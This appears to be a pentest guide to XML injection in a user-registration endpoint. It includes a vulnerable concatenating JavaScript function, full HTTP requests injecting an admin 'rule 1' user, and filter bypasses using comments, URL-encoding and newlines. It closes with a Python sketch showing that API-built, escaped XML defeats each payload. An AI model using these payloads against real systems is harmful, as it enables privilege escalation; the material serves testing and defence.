XML

Insert XML payloads, such as <test>, in each parameter until you receive an XML error like the following:

XML declaration allowed only at the start of the document

Now look for anything that shows how the XML structure is built, such as JS files, so that payloads can be shaped to fit it.

function WSregister__old() {
    // Field values are read straight from the form
    var name = document.getElementById("name").value;
    var username = document.getElementById("user").value;
    var password = document.getElementById("password").value;
    // The XML document is built by string concatenation, with no escaping of <, > or &
    var xml = '<?xml version="1.0" encoding="utf-8"?> ';
    xml += '<user> ';
    xml += ' <rule>2</rule> ';
    xml += ' <name>' + name + '</name> ';
    xml += ' <username>' + username + '</username> ';
    xml += ' <password>' + password + '</password> ';
    xml += '</user> ';
    $.ajax({

Capture a request and modify the parameter to inject a new user with "rule 1" and see if you can elevate your account.

POST /add_new.php HTTP/1.1
Host: Vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 109
Connection: close

name=user1&user=user1</username></user><user><rule>1</rule><name>admin</name><username>admin&password=password

If the application strips some of the characters, consider a double injection and URL-encoding the payload, or try submitting it via the application instead:

name: </name></user><user><rule>1<!--
username: --></rule><name>admin1</name><username>admin1
password: pentest

Full Payload

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close

name=%3C%2Fname%3E%3C%2Fuser%3E%3Cuser%3E%3Crule%3E1%3C!--&user=--%3E%3C%2Frule%3E%3Cname%3Ea%3C%2Fname%3E%3Cusername%3Ea&password=pentest

Further Filtering

The check may be case-insensitive, and it seems that spaces and tabs between the tag name and the closing > character may be ignored as well. However, if we inject a new line, it is not filtered!

Try adding new lines to see if they still work:

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: vulnerable.host
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 84
Connection: close

name=</name></user><user><rule
>1<!--&user=--></rule
><username>l33t&password=1337
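
Seen from the defending side, all three requests above fail against the same fix: build the record through an XML API so field values are serialized as escaped text, rather than filtering tag names. The sketch below is an added example, not code from the application described on this page; it assumes the server stores each record under a `<users>` root, and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Constructed inputs mirroring the three requests on this page: (name, username, password).
SAMPLES = [
    ("user1", "user1</username></user><user><rule>1</rule><name>admin</name><username>admin", "password"),
    ("</name></user><user><rule>1<!--", "--></rule><name>admin1</name><username>admin1", "pentest"),
    ("</name></user><user><rule\n>1<!--", "--></rule\n><username>l33t", "1337"),
]

def build_concat(name, username, password):
    # Same pattern as WSregister__old(): untrusted strings pasted between tags.
    return ("<user><rule>2</rule><name>" + name + "</name><username>" + username
            + "</username><password>" + password + "</password></user>")

def build_safe(name, username, password):
    # Values are assigned as text nodes; the serializer escapes <, > and &.
    user = ET.Element("user")
    for tag, value in (("rule", "2"), ("name", name),
                       ("username", username), ("password", password)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(user, encoding="unicode")

def stored_users(fragment):
    # Assumption: the server appends the fragment under a <users> root element.
    root = ET.fromstring("<users>" + fragment + "</users>")
    return [(u.findtext("rule"), u.findtext("username")) for u in root.iter("user")]

def compare():
    # For each sample: (records parsed from the concatenated XML, records from the safe XML).
    return [(stored_users(build_concat(*s)), stored_users(build_safe(*s))) for s in SAMPLES]

if __name__ == "__main__":
    for vulnerable, hardened in compare():
        print("concat:", vulnerable)
        print("safe:  ", hardened)
```

With concatenation every sample parses as two `<user>` records, the second carrying rule 1; with the API-built document each parses as a single rule 2 record whose username is the literal submitted string, newline included.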